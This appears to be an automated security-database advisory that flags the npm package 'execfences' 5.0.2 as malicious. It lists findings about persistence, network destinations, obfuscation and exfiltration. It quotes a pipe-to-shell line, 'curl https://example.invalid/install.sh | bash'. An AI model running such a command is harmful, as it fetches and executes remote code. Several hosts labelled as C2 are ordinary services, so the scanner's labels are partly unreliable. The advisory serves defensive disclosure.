VDB
GCVE-110-OSM-2026-7128
GCVE-110-OSM-2026-7128
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code.
ENTRY
bin/execfence.js (bin: bin/execfence.js)
PERSISTENCE
- Startup Persistence in lib/config-validate.js: ".profile"
- Startup Persistence in lib/investigation.js: ".profile"
- Startup Persistence in lib/npm-guard.js: ".bashrc"
- Startup Persistence in lib/report.js: ".profile"
- Startup Persistence in lib/sandbox.js: ".profile"
DESTINATION
- custom-c2: parsed.ci (primary, deobfuscated) in lib/cli.js
- custom-c2: https://api.osv.dev/v1/query (plaintext) in lib/deps-review.js
- custom-c2: https://example.invalid/install.sh (plaintext) in lib/doctor.js
- custom-c2: https://example.invalid/p (plaintext) in lib/doctor.js
- custom-c2: https://jitpack.io (plaintext) in lib/doctor.js
- custom-c2: http://example.invalid/Bad.nupkg (plaintext) in lib/doctor.js
- custom-c2: api.osv.dev (plaintext) in lib/deps-review.js
- custom-c2: jitpack.io (plaintext) in lib/doctor.js
(+7 more)
EXFIL
- Data Encoding for Exfiltration in lib/deps-review.js: "encodeURIComponent(dependency.name)}/json"
- Curl/Wget Pipe to Shell in lib/doctor.js: "curl https://example.invalid/install.sh | bash"
- Data Encoding for Exfiltration in lib/enrichment.js: "encodeURIComponent(pkg)}`, { timeoutMs"
- HTTP Data Exfiltration in lib/sandbox.js: "process.cwd(), commandArgs = [], options = {}) { const loaded = loadSandboxConfi..."
- System Information Collection in lib/agent-rules.js: "os.homedir()"
- System Information Collection in lib/cli.js: "os.homedir()"
- System Information Collection in lib/guard.js: "os.homedir()"
- System Information Collection in lib/npm-guard.js: "os.homedir()"
(+4 more)
OBFUSCATION
- IOCs Found in Deobfuscated Code in bin/execfence.js
- IOCs Found in Deobfuscated Code in lib/cli.js
- Whitespace-Padded Hidden Payload in bin/execfence.js: "; global"
- Obfuscation: function to array replacements in bin/execfence.js
- Obfuscation patterns: underscoreDollarVars, splitJoinChain in bin/execfence.js
- Obfuscation patterns: underscoreDollarVars, splitJoinChain in lib/cli.js
- recovered 2 urls, 5 domains, 5 _domainCandidates from decoded/deobfuscated content
ADDITIONAL FINDINGS
- Dynamic Code Execution in lib/cli.js: "eval(r)"
- Shell Command Execution in lib/cli.js: "execSync("
- Silent Process Execution in lib/cli.js: "windowsHide:true"
- Platform Detection with Data Collection in lib/deps-review.js: "JSON.stringify({ json, cachedAt: new Date().toISOS"
- Brand New Package
- Publisher Has Other Malicious Packages
PAYLOAD FILES
lib/cli.js (+ bin/execfence.js, lib/sandbox.js)
INDICATORS (IOCs)
- urls: https://chrystyan96.github.io/ExecFence/, https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html, https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/, https://json.schemastore.org/sarif-2.1.0.json, https://api.trongrid.io/v1/accounts/ (+1 more)
- domains: chrystyan96.github.io, go.work, www.trendmicro.com, securitylabs.datadoghq.com, files.pythonhosted.org (+2 more)
- sha256Hashes: 9d377c49b1f5f3c61acd9dd3f4a8f0e8749f23d3c8d2d9080f24e7a0b2c2d4ef, 0000000000000000000000000000000000000000000000000000000000000000
- payloadFileHash: 3ee9df6f076303f7c56ac74ee01868f03f43a29bb13c83d5092d18572e034a52
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | execfences | 5.0.2 (affected) | — |
Browse GCVE Records
74,581 records in the GCVE database · Updated July 24, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.